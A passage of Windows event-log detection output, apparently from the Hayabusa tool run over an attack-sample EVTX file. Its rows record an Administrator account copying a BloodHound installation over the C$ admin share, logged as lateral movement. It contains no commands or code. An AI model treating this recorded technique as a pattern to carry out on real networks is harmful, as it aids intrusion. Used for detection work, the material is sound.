+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
-2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share 
File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
